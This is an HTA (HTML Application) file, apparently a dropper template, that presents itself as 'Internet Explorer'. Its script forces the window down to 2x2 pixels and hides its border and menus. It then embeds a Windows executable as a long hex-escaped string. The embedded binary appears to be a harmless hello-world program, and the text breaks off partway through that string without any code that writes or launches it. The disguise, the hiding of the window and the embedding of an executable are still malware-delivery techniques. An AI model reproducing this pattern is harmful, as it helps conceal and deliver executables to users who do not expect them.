<!--example-->
<html>
<head>
<title>Internet Explorer</title>

<script LANGUAGE="javaScript">
<!-- 

// 窗口尺寸2*2
while (true) {  
    try {  
    var w = 2, h = 2;  
        window.resizeTo(w, h);  
        window.moveTo((window.screen.width - w) / 2, (window.screen.height - h) / 2);  
        break;  
    } catch (e) { continue; }  
}

-->
</script>

<HTA:APPLICATION
	border = "none"
	caption = "no"
	maximizebutton = "no"
	minimizebutton = "no"
	sysMenu = "no"
	scroll = "no"
	contextmenu = "no"
	selection = "no"
	ShowInTaskBar = "no"
	windowstate = "minimize"
	ShowInTaskBar = "yes"
	windowstate = "normal"
>

</head>
<body>

<SCRipT LANGUAGE="javaScript"> 
<!-- 

// 可执行文件内容
var code_context = "\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a\x24\x00\x00\x00\x00\x00\x00\x00\x01\x47\x51\x7c\x45\x26\x3f\x2f\x45\x26\x3f\x2f\x45\x26\x3f\x2f\x48\x74\xe2\x2f\x46\x26\x3f\x2f\x48\x74\xe0\x2f\x44\x26\x3f\x2f\x48\x74\xdf\x2f\x56\x26\x3f\x2f\x48\x74\xde\x2f\x47\x26\x3f\x2f\x98\xd9\xf4\x2f\x47\x26\x3f\x2f\x45\x26\x3e\x2f\x60\x26\x3f\x2f\x60\x51\xda\x2f\x47\x26\x3f\x2f\x48\x74\xe4\x2f\x44\x26\x3f\x2f\x60\x51\xe1\x2f\x44\x26\x3f\x2f\x52\x69\x63\x68\x45\x26\x3f\x2f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4c\x01\x05\x00\x15\x6f\xc9\x5a\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02\x01\x0b\x01\x0c\x00\x00\x0a\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x94\x12\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00\x00\x10\x00\x00\x00\x02\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x03\x00\x40\x81\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x22\x00\x00\x3c\x00\x00\x00\x00\x40\x00\x00\xe0\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x00\x00\x54\x01\x00\x00\xc0\x20\x00\x00\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x21\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x54\x08\x00\x00\x00\x10\x00\x00\x00\x0a\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x60\x2e\x72\x64\x61\x74\x61\x00\x00\xc2\x05\x00\x00\x00\x20\x00\x00\x00\x06\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2e\x64\x61\x74\x61\x00\x00\x00\x80\x03\x00\x00\x00\x30\x00\x00\x00\x02\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xc0\x2e\x72\x73\x72\x63\x00\x00\x00\xe0\x01\x00\x00\x00\x40\x00\x00\x00\x02\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x40\x2e\x72\x65\x6c\x6f\x63\x00\x00\x54\x01\x00\x00\x00\x50\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x42\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x00\x21\x40\x00\xff\x15\x94\x20\x40\x00\x68\x10\x21\x40\x00\xff\x15\x90\x20\x40\x00\x83\xc4\x08\x33\xc0\xc3\x3b\x0d\x00\x30\x40\x00\x75\x02\xf3\xc3\xe9\xb0\x02\x00\x00\xb8\x4d\x5a\x00\x00\x66\x39\x05\x00\x00\x40\x00\x74\x04\x33\xc0\xeb\x34\x8b\x0d\x3c\x00\x40\x00\x81\xb9\x00\x00\x40\x00\x50\x45\x00\x00\x75\xea\xb8\x0b\x01\x00\x00\x66\x39\x81\x18\x00\x40\x00\x75\xdc\x33\xc0\x83\xb9\x74\x00\x40\x00\x0e\x76\x09\x39\x81\xe8\x00\x40\x00\x0f\x95\xc0\x6a\x01\xa3\x20\x30\x40\x00\xff\x15\x80\x20\x40\x00\x59\x6a\xff\xff\x15\x18\x20\x40\x00\x8b\x0d\x38\x20\x40\x00\xa3\x74\x33\x40\x00\xa3\x78\x33\x40\x00\xa1\x64\x33\x40\x00\x89\x01\x8b\x0d\x3c\x20\x40\x00\xa1\x58\x33\x40\x00\x89\x01\xe8\x6a\x06\x00\x00\xe8\x68\x05\x00\x00\x83\x3d\x08\x30\x40\x00\x00\x75\x0c\x68\x1d\x16\x40\x00\xff\x15\x28\x20\x40\x00\x59\xe8\x8b\x06\x00\x00\x83\x3d\x10\x30\x40\x00\xff\x75\x09\x6a\xff\xff\x15\x24\x20\x40\x00\x59\x33\xc0\xc3\x68\x3a\x17\x40\x00\xe8\x17\x06\x00\x00\xa1\x60\x33\x40\x00\xc7\x04\x24\x34\x30\x40\x00\xff\x35\x5c\x33\x40\x00\xa3\x34\x30\x40\x00\x68\x2c\x30\x40\x00\x68\x28\x30\x40\x00\x68\x24\x30\x40\x00\xff\x15\x84\x20\x40\x00\x83\xc4\x14\xa3\x30\x30\x40\x00\x85\xc0\x79\x08\x6a\x08\xe8\xff\x02\x00\x00\x59\xc3\x6a\x0c\x68\xf8\x21\x40\x00\xe8\x55\x06\x00\x00\x33\xdb\x89\x5d\xfc\x64\xa1\x18\x00\x00\x00\x8b\x50\x04\x8b\xfb\xbe\x6c\x33\x40\x00\x8b\xca\x33\xc0\xf0\x0f\xb1\x0e\x85\xc0\x74\x0b\x3b\xc2\x75\xf0\x33\xf6\x46\x8b\xfe\xeb\x03\x33\xf6\x46\x39\x35\x70\x33\x40\x00\x75\x0a\x6a\x1f\xe8\xb3\x02\x00\x00\x59\xeb\x3a\x39\x1d\x70\x33\x40\x00\x75\x2c\x89\x35\x70\x33\x40\x00\x68\xb8\x20\x40\x00\x68\xa8\x20\x40\x00\xe8\xe9\x05\x00\x00\x59\x59\x85\xc0\x74\x17\xc7\x45\xfc\xfe\xff\xff\xff\xb8\xff\x00\x00\x00\xe9\xde\x00\x00\x00\x89\x35\x18\x30\x40\x00\x39\x35\x70\x33\x40\x00\x75\x1b\x68\xa4\x20\x40\x00\x68\x9c\x20\x40\x00\xe8\xbb\x05\x00\x00\x59\x59\xc7\x05\x70\x33\x40\x00\x02\x00\x00\x00\x85\xff\x75\x09\x33\xc0\xb9\x6c\x33\x40\x00\x87\x01\x83\x3d\x7c\x33\x40\x00\x00\x74\x19\x68\x7c\x33\x40\x00\xe8\x97\x02\x00\x00\x59\x85\xc0\x74\x0a\x53\x6a\x02\x53\xff\x15\x7c\x33\x40\x00\x8b\x0d\x2c\x30\x40\x00\xa1\x34\x20\x40\x00\x89\x08\xff\x35\x2c\x30\x40\x00\xff\x35\x28\x30\x40\x00\xff\x35\x24\x30\x40\x00\xe8\xd4\xfd\xff\xff\x83\xc4\x0c\xa3\x1c\x30\x40\x00\x83\x3d\x20\x30\x40\x00\x00\x75\x36\x50\xff\x15\x7c\x20\x40\x00\x8b\x4d\xec\x8b\x01\x8b\x00\x89\x45\xe4\x51\x50\xe8\xd1\x01\x00\x00\x59\x59\xc3\x8b\x65\xe8\x8b\x45\xe4\xa3\x1c\x30\x40\x00\x83\x3d\x20\x30\x40\x00\x00\x75\x07\x50\xff\x15\x78\x20\x40\x00\x83\x3d\x18\x30\x40\x00\x00\x75\x0b\xff\x15\x4c\x20\x40\x00\xa1\x1c\x30\x40\x00\xc7\x45\xfc\xfe\xff\xff\xff\xe8\x42\x05\x00\x00\xc3\xe8\xe8\x02\x00\x00\xe9\x91\xfe\xff\xff\x55\x8b\xec\xff\x15\x14\x20\x40\x00\x6a\x01\xa3\x54\x33\x40\x00\xe8\x59\x05\x00\x00\xff\x75\x08\xe8\x57\x05\x00\x00\x83\x3d\x54\x33\x40\x00\x00\x59\x59\x75\x08\x6a\x01\xe8\x3f\x05\x00\x00\x59\x68\x09\x04\x00\xc0\xe8\x40\x05\x00\x00\x59\x5d\xc3\x55\x8b\xec\x81\xec\x24\x03\x00\x00\x6a\x17\xe8\x63\x05\x00\x00\x85\xc0\x74\x05\x6a\x02\x59\xcd\x29\xa3\x38\x31\x40\x00\x89\x0d\x34\x31\x40\x00\x89\x15\x30\x31\x40\x00\x89\x1d\x2c\x31\x40\x00\x89\x35\x28\x31\x40\x00\x89\x3d\x24\x31\x40\x00\x66\x8c\x15\x50\x31\x40\x00\x66\x8c\x0d\x44\x31\x40\x00\x66\x8c\x1d\x20\x31\x40\x00\x66\x8c\x05\x1c\x31\x40\x00\x66\x8c\x25\x18\x31\x40\x00\x66\x8c\x2d\x14\x31\x40\x00\x9c\x8f\x05\x48\x31\x40\x00\x8b\x45\x00\xa3\x3c\x31\x40\x00\x8b\x45\x04\xa3\x40\x31\x40\x00\x8d\x45\x08\xa3\x4c\x31\x40\x00\x8b\x85\xdc\xfc\xff\xff\xc7\x05\x88\x30\x40\x00\x01\x00\x01\x00\xa1\x40\x31\x40\x00\xa3\x44\x30\x40\x00\xc7\x05\x38\x30\x40\x00\x09\x04\x00\xc0\xc7\x05\x3c\x30\x40\x00\x01\x00\x00\x00\xc7\x05\x48\x30\x40\x00\x01\x00\x00\x00\x6a\x04\x58\x6b\xc0\x00\xc7\x80\x4c\x30\x40\x00\x02\x00\x00\x00\x6a\x04\x58\x6b\xc0\x00\x8b\x0d\x00\x30\x40\x00\x89\x4c\x05\xf8\x6a\x04\x58\xc1\xe0\x00\x8b\x0d\x04\x30\x40\x00\x89\x4c\x05\xf8\x68\xf8\x20\x40\x00\xe8\xcc\xfe\xff\xff\x8b\xe5\x5d\xc3\x55\x8b\xec\x8b\x45\x08\x8b\x00\x81\x38\x63\x73\x6d\xe0\x75\x25\x83\x78\x10\x03\x75\x1f\x8b\x40\x14\x3d\x20\x05\x93\x19\x74\x1b\x3d\x21\x05\x93\x19\x74\x14\x3d\x22\x05\x93\x19\x74\x0d\x3d\x00\x40\x99\x01\x74\x06\x33\xc0\x5d\xc2\x04\x00\xe8\x08\x04\x00\x00\xcc\x68\xd6\x13\x40\x00\xe8\x03\x04\x00\x00\x59\x33\xc0\xc3\xcc\xff\x25\x8c\x20\x40\x00\xff\x25\x88\x20\x40\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x8b\x45\x08\x33\xd2\x53\x56\x57\x8b\x48\x3c\x03\xc8\x0f\xb7\x41\x14\x0f\xb7\x59\x06\x83\xc0\x18\x03\xc1\x85\xdb\x74\x1b\x8b\x7d\x0c\x8b\x70\x0c\x3b\xfe\x72\x09\x8b\x48\x08\x03\xce\x3b\xf9\x72\x0a\x42\x83\xc0\x28\x3b\xd3\x72\xe8\x33\xc0\x5f\x5e\x5b\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x6a\xfe\x68\x18\x22\x40\x00\x68\xe9\x17\x40\x00\x64\xa1\x00\x00\x00\x00\x50\x83\xec\x08\x53\x56\x57\xa1\x00\x30\x40\x00\x31\x45\xf8\x33\xc5\x50\x8d\x45\xf0\x64\xa3\x00\x00\x00\x00\x89\x65\xe8\xc7\x45\xfc\x00\x00\x00\x00\x68\x00\x00\x40\x00\xe8\x7c\x00\x00\x00\x83\xc4\x04\x85\xc0\x74\x54\x8b\x45\x08\x2d\x00\x00\x40\x00\x50\x68\x00\x00\x40\x00\xe8\x52\xff\xff\xff\x83\xc4\x08\x85\xc0\x74\x3a\x8b\x40\x24\xc1\xe8\x1f\xf7\xd0\x83\xe0\x01\xc7\x45\xfc\xfe\xff\xff\xff\x8b\x4d\xf0\x64\x89\x0d\x00\x00\x00\x00\x59\x5f\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x45\xec\x8b\x00\x33\xc9\x81\x38\x05\x00\x00\xc0\x0f\x94\xc1\x8b\xc1\xc3\x8b\x65\xe8\xc7\x45\xfc\xfe\xff\xff\xff\x33\xc0\x8b\x4d\xf0\x64\x89\x0d\x00\x00\x00\x00\x59\x5f\x5e\x5b\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x8b\x45\x08\xb9\x4d\x5a\x00\x00\x66\x39\x08\x74\x04\x33\xc0\x5d\xc3\x8b\x48\x3c\x03\xc8\x33\xc0\x81\x39\x50\x45\x00\x00\x75\x0c\xba\x0b\x01\x00\x00\x66\x39\x51\x18\x0f\x94\xc0\x5d\xc3\x55\x8b\xec\x83\xec\x14\x83\x65\xf4\x00\x83\x65\xf8\x00\xa1\x00\x30\x40\x00\x56\x57\xbf\x4e\xe6\x40\xbb\xbe\x00\x00\xff\xff\x3b\xc7\x74\x0d\x85\xc6\x74\x09\xf7\xd0\xa3\x04\x30\x40\x00\xeb\x66\x8d\x45\xf4\x50\xff\x15\x00\x20\x40\x00\x8b\x45\xf8\x33\x45\xf4\x89\x45\xfc\xff\x15\x04\x20\x40\x00\x31\x45\xfc\xff\x15\x08\x20\x40\x00\x31\x45\xfc\x8d\x45\xec\x50\xff\x15\x0c\x20\x40\x00\x8b\x4d\xf0\x8d\x45\xfc\x33\x4d\xec\x33\x4d\xfc\x33\xc8\x3b\xcf\x75\x07\xb9\x4f\xe6\x40\xbb\xeb\x10\x85\xce\x75\x0c\x8b\xc1\x0d\x11\x47\x00\x00\xc1\xe0\x10\x0b\xc8\x89\x0d\x00\x30\x40\x00\xf7\xd1\x89\x0d\x04\x30\x40\x00\x5f\x5e\x8b\xe5\x5d\xc3\x33\xc0\xc3\x83\x3d\x78\x33\x40\x00\x00\x74\x03\x33\xc0\xc3\x56\x6a\x04\x6a\x20\xff\x15\x60\x20\x40\x00\x59\x59\x8b\xf0\x56\xff\x15\x18\x20\x40\x00\xa3\x78\x33\x40\x00\xa3\x74\x33\x40\x00\x85\xf6\x75\x05\x6a\x18\x58\x5e\xc3\x83\x26\x00\x33\xc0\x5e\xc3\x6a\x14\x68\x38\x22\x40\x00\xe8\x28\x01\x00\x00\x83\x65\xdc\x00\xff\x35\x78\x33\x40\x00\x8b\x35\x1c\x20\x40\x00\xff\xd6\x89\x45\xe4\x83\xf8\xff\x75\x0c\xff\x75\x08\xff\x15\x68\x20\x40\x00\x59\xeb\x65\x6a\x08\xe8\x95\x01\x00\x00\x59\x83\x65\xfc\x00\xff\x35\x78\x33\x40\x00\xff\xd6\x89\x45\xe4\xff\x35\x74\x33\x40\x00\xff\xd6\x89\x45\xe0\x8d\x45\xe0\x50\x8d\x45\xe4\x50\xff\x75\x08\x8b\x35\x18\x20\x40\x00\xff\xd6\x50\xe8\x6d\x01\x00\x00\x83\xc4\x0c\x8b\xf8\x89\x7d\xdc\xff\x75\xe4\xff\xd6\xa3\x78\x33\x40\x00\xff\x75\xe0\xff\xd6\xa3\x74\x33\x40\x00\xc7\x45\xfc\xfe\xff\xff\xff\xe8\x0b\x00\x00\x00\x8b\xc7\xe8\xdd\x00\x00\x00\xc3\x8b\x7d\xdc\x6a\x08\xe8\x2d\x01\x00\x00\x59\xc3\x55\x8b\xec\xff\x75\x08\xe8\x4c\xff\xff\xff\xf7\xd8\x59\x1b\xc0\xf7\xd8\x48\x5d\xc3\x56\x57\xbe\xe8\x21\x40\x00\xbf\xe8\x21\x40\x00\xeb\x0b\x8b\x06\x85\xc0\x74\x02\xff\xd0\x83\xc6\x04\x3b\xf7\x72\xf1\x5f\x5e\xc3\x56\x57\xbe\xf0\x21\x40\x00\xbf\xf0\x21\x40\x00\xeb\x0b\x8b\x06\x85\xc0\x74\x02\xff\xd0\x83\xc6\x04\x3b\xf7\x72\xf1\x5f\x5e\xc3\x56\x68\x00\x00\x03\x00\x68\x00\x00\x01\x00\x33\xf6\x56\xe8\xd5\x00\x00\x00\x83\xc4\x0c\x85\xc0\x75\x02\x5e\xc3\x56\x56\x56\x56\x56\xe8\xbc\x00\x00\x00\xcc\xcc\xff\x25\x2c\x20\x40\x00\xff\x25\x30\x20\x40\x00\xcc\xcc\x68\xe9\x17\x40\x00\x64\xff\x35\x00\x00\x00\x00\x8b\x44\x24\x10\x89\x6c\x24\x10\x8d\x6c\x24\x10\x2b\xe0\x53\x56\x57\xa1\x00\x30\x40\x00\x31\x45\xfc\x33\xc5\x50\x89\x65\xe8\xff\x75\xf8\x8b\x45\xfc\xc7\x45\xfc\xfe\xff\xff\xff\x89\x45\xf8\x8d\x45\xf0\x64\xa3\x00\x00\x00\x00\xc3\x8b\x4d\xf0\x64\x89\x0d\x00\x00\x00\x00\x59\x5f\x5f\x5e\x5b\x8b\xe5\x5d\x51\xc3\x55\x8b\xec\xff\x75\x14\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x68\x1c\x10\x40\x00\x68\x00\x30\x40\x00\xe8\x41\x00\x00\x00\x83\xc4\x18\x5d\xc3\xff\x25\x40\x20\x40\x00\xff\x25\x44\x20\x40\x00\xff\x25\x48\x20\x40\x00\xff\x25\x50\x20\x40\x00\xff\x25\x54\x20\x40\x00\xff\x25\x58\x20\x40\x00\xff\x25\x5c\x20\x40\x00\xff\x25\x64\x20\x40\x00\xff\x25\x6c\x20\x40\x00\xff\x25\x70\x20\x40\x00\xff\x25\x74\x20\x40\x00\xff\x25\x10\x20\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x25\x00\x00\x74\x25\x00\x00\x5e\x25\x00\x00\x44\x25\x00\x00\x28\x25\x00\x00\x14\x25\x00\x00\x04\x25\x00\x00\xa4\x25\x00\x00\x00\x00\x00\x00\xa8\x23\x00\x00\xbe\x23\x00\x00\xd2\x23\x00\x00\xe0\x23\x00\x00\xec\x23\x00\x00\xfa\x23\x00\x00\x04\x24\x00\x00\x10\x24\x00\x00\x26\x24\x00\x00\x40\x24\x00\x00\x9e\x23\x00\x00\x58\x24\x00\x00\x6c\x24\x00\x00\x90\x24\x00\x00\x98\x24\x00\x00\xa2\x24\x00\x00\xb0\x24\x00\x00\xbe\x24\x00\x00\xc8\x24\x00\x00\xda\x24\x00\x00\xea\x24\x00\x00\x96\x23\x00\x00\x8e\x23\x00\x00\x7c\x23\x00\x00\x6a\x23\x00\x00\x5c\x23\x00\x00\x4e\x23\x00\x00\x36\x23\x00\x00\x2c\x23\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x10\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2b\x10\x40\x00\x20\x16\x40\x00\x17\x14\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x6f\xc9\x5a\x00\x00\x00\x00\x02\x00\x00\x00\x64\x00\x00\x00\x60\x21\x00\x00\x60\x0f\x00\x00\x00\x00\x00\x00\x15\x6f\xc9\x5a\x00\x00\x00\x00\x0c\x00\x00\x00\x14\x00\x00\x00\xc4\x21\x00\x00\xc4\x0f\x00\x00\x38\x30\x40\x00\x88\x30\x40\x00\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0a\x00\x00\x00\x00\x70\x61\x75\x73\x65\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x40\x00\xe0\x21\x40\x00\x01\x00\x00\x00\x52\x53\x44\x53\x7b\xd9\x37\x07\x63\x6c\xdc\x43\xb1\xc8\xa3\xc7\x46\x4f\x53\x36\x01\x00\x00\x00\x43\x3a\x5c\x55\x73\x65\x72\x73\x5c\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x5c\x44\x65\x73\x6b\x74\x6f\x70\x5c\x48\x65\x6c\x6c\x6f\x57\x6f\x72\x6c\x64\x5c\x48\x65\x6c\x6c\x6f\x57\x6f\x72\x6c\x64\x5c\x52\x65\x6c\x65\x61\x73\x65\x5c\x48\x65\x6c\x6c\x6f\x57\x6f\x72\x6c\x64\x2e\x70\x64\x62\x00\x00\x00\x00\x00\x17\x00\x00\x00\x17\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xd4\xff\xff\xff\x00\x00\x00\x00\xfe\xff\xff\xff\x44\x12\x40\x00\x58\x12\x40\x00\x00\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xd8\xff\xff\xff\x00\x00\x00\x00\xfe\xff\xff\xff\x19\x15\x40\x00\x2c\x15\x40\x00\x00\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xf9\x16\x40\x00\xb4\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x23\x00\x00\x24\x20\x00\x00\x90\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x25\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x25\x00\x00\x74\x25\x00\x00\x5e\x25\x00\x00\x44\x25\x00\x00\x28\x25\x00\x00\x14\x25\x00\x00\x04\x25\x00\x00\xa4\x25\x00\x00\x00\x00\x00\x00\xa8\x23\x00\x00\xbe\x23\x00\x00\xd2\x23\x00\x00\xe0\x23\x00\x00\xec\x23\x00\x00\xfa\x23\x00\x00\x04\x24\x00\x00\x10\x24\x00\x00\x26\x24\x00\x00\x40\x24\x00\x00\x9e\x23\x00\x00\x58\x24\x00\x00\x6c\x24\x00\x00\x90\x24\x00\x00\x98\x24\x00\x00\xa2\x24\x00\x00\xb0\x24\x00\x00\xbe\x24\x00\x00\xc8\x24\x00\x00\xda\x24\x00\x00\xea\x24\x00\x00\x96\x23\x00\x00\x8e\x23\x00\x00\x7c\x23\x00\x00\x6a\x23\x00\x00\x5c\x23\x00\x00\x4e\x23\x00\x00\x36\x23\x00\x00\x2c\x23\x00\x00\x00\x00\x00\x00\xfd\x06\x70\x72\x69\x6e\x74\x66\x00\x00\x52\x07\x73\x79\x73\x74\x65\x6d\x00\x00\x4d\x53\x56\x43\x52\x31\x32\x30\x2e\x64\x6c\x6c\x00\x00\x6b\x01\x5f\x58\x63\x70\x74\x46\x69\x6c\x74\x65\x72\x00\x17\x02\x5f\x61\x6d\x73\x67\x5f\x65\x78\x69\x74\x00\x00\x08\x02\x5f\x5f\x77\x67\x65\x74\x6d\x61\x69\x6e\x61\x72\x67\x73\x00\x00\xf2\x01\x5f\x5f\x73\x65\x74\x5f\x61\x70\x70\x5f\x74\x79\x70\x65\x00\x00\x4e\x06\x65\x78\x69\x74\x00\x00\x83\x02\x5f\x65\x78\x69\x74\x00\x2f\x02\x5f\x63\x65\x78\x69\x74\x00\x00\x40\x02\x5f\x63\x6f\x6e\x66\x69\x67\x74\x68\x72\x65\x61\x64\x6c\x6f\x63\x61\x6c\x65\x00\xf4\x01\x5f\x5f\x73\x65\x74\x75\x73\x65\x72\x6d\x61\x74\x68\x65\x72\x72\x00\x00\x0d\x03\x5f\x69\x6e\x69\x74\x74\x65\x72